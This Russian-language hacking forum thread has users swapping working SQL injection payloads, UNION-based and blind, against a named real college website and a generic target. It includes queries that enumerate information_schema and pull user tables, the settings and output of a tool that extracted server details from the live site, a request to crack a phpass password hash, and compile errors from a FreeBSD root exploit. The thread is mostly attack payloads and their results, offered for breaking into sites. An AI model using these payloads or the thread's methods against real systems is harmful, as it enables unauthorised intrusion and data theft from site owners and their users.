DeluxeS: не неси бред, такой хрени я не мог писать: select+table_schema+from+information_schema.tables+where+table_name='users'-- и вот то, что выведет, и подставлять к users через точку, например вывело amx, значит итоговый правильный запрос такой: http://site.php/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,user,14, 15,16,17,18,19,20,21,22,23,24,25+from+amx.users-- где amx - имя БД, где хранится таблица users ЗЫЖ Вот уродец, ниже еще один
http://site.php/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat(schema_name),14,15,16,17,18,19,20,21,22,23,24 ,25+from+information_schema.shemata-- перед users поставь базу через которую ета таблица работает, просто она там неодна... ну типа db.user-- ЗЫЖ сам уродец...
даже интересно стало, кто тебе помог из парней - DeluxeS или 547? Т.е. на чьем примере из этих двух гениев получения имени БД ты достиг нужного результата?
Аллах Агбар, сам допер. И до остального допер бы тоже сам, если бы хоть раз досканально изучил подпись jokestera. Причем в течении 5 минут примерно не базу, а имя таблицы. Не фильтруются, а magic_quotes=ON
Спасибо буду знать а где это подскажите плиз еще что это за хэш $P$BXnTLgitAWI18nma9N56AwYv/HbpUf0 вроде как и md5 но на web сервисах пишет что типа не правельный формат
http://www.trcc.cc.mo.us/newsdetail.php?ID=156%27 Как можно ее раскрутить, сори за нубовский вопрос. Вернее как подобрать количество полей. Спасибо.
Спасибо. !!!А где про эти методы можно подробнее почитать? Грабли =) http://www.trcc.cc.mo.us/newsdetail.php?ID=156%27+union+select+1,2,3,4,5,6,7,8,9,10,11--%20+ Что не так? )
Что-то много вопрос от меня сегодня... Запрос вида +union+select+1,convert(version()+using+latin1),3,4,5,6,7,8,9,10,11,12,13,14-- Выдает ошибку Illegal mix of collations for operation 'UNION' Если использовать просто +union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14-- То Illegal mix of collations (latin1_general_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION' Как такое побороть?
компилирую етот сплойт _http://forum.antichat.ru/thread160377.html ! пишу Code: gcc ls.c -o run выдает: Code: ls.c:1: error: syntax error at '##' token ls.c:1: error: syntax error at '##' token ls.c:1: error: syntax error at '##' token ls.c:1: error: syntax error at '##' token ls.c:1: error: syntax error at '##' token ls.c:1: error: syntax error at '##' token ls.c:1: error: syntax error at '##' token ls.c:1: error: syntax error at '##' token ls.c:1: error: syntax error at '##' token ls.c:1: error: syntax error at '##' token ls.c:1: error: syntax error at '##' token ls.c:1: error: syntax error at '##' token ls.c:1: error: syntax error at '##' token ls.c:1: error: syntax error at '##' token ls.c:1: error: syntax error at '##' token ls.c:1: error: syntax error at '#' token ls.c:2:3: invalid preprocessing directive #EDB ls.c:3:3: invalid preprocessing directive #CVE ls.c:4:3: invalid preprocessing directive #Title ls.c:5:3: invalid preprocessing directive #Author ls.c:6:3: invalid preprocessing directive #Published ls.c:7:3: invalid preprocessing directive #Download ls.c:8:3: invalid preprocessing directive #Download ls.c:9: error: syntax error at '##' token ls.c:9: error: syntax error at '##' token ls.c:9: error: syntax error at '##' token ls.c:9: error: syntax error at '##' token ls.c:9: error: syntax error at '##' token ls.c:9: error: syntax error at '##' token ls.c:9: error: syntax error at '##' token ls.c:9: error: syntax error at '##' token ls.c:9: error: syntax error at '##' token ls.c:9: error: syntax error at '##' token ls.c:9: error: syntax error at '##' token ls.c:9: error: syntax error at '##' token ls.c:9: error: syntax error at '##' token ls.c:9: error: syntax error at '##' token ls.c:9: error: syntax error at '##' token ls.c:9: error: syntax error at '#' token ls.c:10: error: syntax error before '&' token ls.c:16: error: syntax error before "long" ls.c:27: warning: data definition has no type or storage class ls.c:28: error: syntax error before "r00tbox" ls.c:28: error: syntax error at '#' token ls.c:30: error: stray '@' in program ls.c:31: error: `kcope' undeclared here (not in a function) ls.c:31: error: called object is not a function ls.c:31: error: syntax error before "gid" ls.c:36:20: warning: multi-character character constant ls.c:38:10: warning: character constant too long for its type ls.c:40:10: warning: character constant too long for its type ls.c:42:10: warning: character constant too long for its type ls.c:43: warning: data definition has no type or storage class ls.c:44: warning: data definition has no type or storage class ls.c:44: error: syntax error before "value" ls.c:45: warning: data definition has no type or storage class ls.c:45: error: syntax error before "value" ls.c:46: warning: data definition has no type or storage class ls.c:46: error: syntax error before "value" ls.c:47: warning: data definition has no type or storage class ls.c:47: error: syntax error before "value" ls.c:48: warning: data definition has no type or storage class ls.c:48: error: syntax error before "value" ls.c:50:3: invalid preprocessing directive #uname ls.c:51: error: syntax error at '#' token ls.c:53: error: stray '@' in program ls.c:54: error: redefinition of 'uid' ls.c:31: error: previous definition of 'uid' was here ls.c:54: error: called object is not a function ls.c:54: error: syntax error before "gid" ls.c:55:3: invalid preprocessing directive #cat ls.c:56:3: invalid preprocessing directive #$FreeBSD ls.c:95:2: invalid preprocessing directive #! In file included from /usr/include/sys/_types.h:33, from /usr/include/stdio.h:45, from ls.c:100: /usr/include/machine/_types.h:75: error: syntax error before "__int_least8_t" ls.c:113: error: syntax error before "gcc" In file included from /usr/include/sys/types.h:44, from /usr/include/unistd.h:41, from ls.c:115: /usr/include/machine/endian.h:158: error: syntax error before "static" In file included from /usr/include/unistd.h:41, from ls.c:115: /usr/include/sys/types.h:64: error: syntax error before "int8_t" In file included from ls.c:115: /usr/include/unistd.h:329: error: conflicting types for 'execl' /usr/include/unistd.h:329: note: a parameter list with an ellipsis can't match a n empty parameter name list declaration ls.c:110: error: previous implicit declaration of 'execl' was here ls.c:126: error: syntax error before "gcc" ls.c:127:45: too many decimal points in number ls.c:128:11: too many decimal points in number ls.c:128:28: too many decimal points in number ls.c:129:6: warning: no newline at end of file как исправить ошыбку? спасибо НЕПОНЯЛ ЕТО ПИСАЛ НЕ Я!!!!!!!!!!!!!!!!!!!!!^
Как правильно сказал Spyder - там Blind: Code: http://www.trcc.cc.mo.us/newsdetail.php?ID=156'+or+1=1+and+substring(version(),1,1)=5--+ Чтобы понять, почему именно пятая ветка, просто подставь 3, а затем 4 вместо 5 - ошибок не увидишь, увидишь разницу в тексте на странице. Которая уникальна только при 5 Тулза схавала на раз: Code: @@version_compile_os: Win64 database(): trccweb @@tmpdir: C:\Windows\TEMP version(): 5.1.35-community user(): webuser@localhost @@basedir: C:\Program Files\MySQL\MySQL Server 5.1\ @@datadir: C:\ProgramData\MySQL\MySQL Server 5.1\Data\ про toolza 1.0 думаю тебе рассказывать не нужно, метод GET, режим NORMAL, настройки: Code: $method = 0; $bl_url = "http://www.trcc.cc.mo.us/newsdetail.php?ID=156'+or+1=1"; $bl_filtr = "--+"; $bl_plus = "+"; $bl_error = "HEARTSAVER FIRST"; $bl_error_type = 1; Нажал на кнопку и зохавал сайт
Здесь блинд, но если тебя интересует конкретно этот сайт, то там рядышком есть и обычная скуля... Code: http://www.trcc.cc.mo.us/display_news_photo.php?ID=-1'+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9,10,11%23
обычный блайнд крутил. Чо такого. Причем здесь "5-ая ветка" и узнавание "системной информации" при блинде. Ну майлбраш нашел неслепую скулю, мололдчик. Тогда конечно уже другой расклад. PS: Вообще-то лично я системной информации придаю большое значение, т.к. даже "@@tmpdir: C:\Windows\TEMP" лично мне о многом говорит
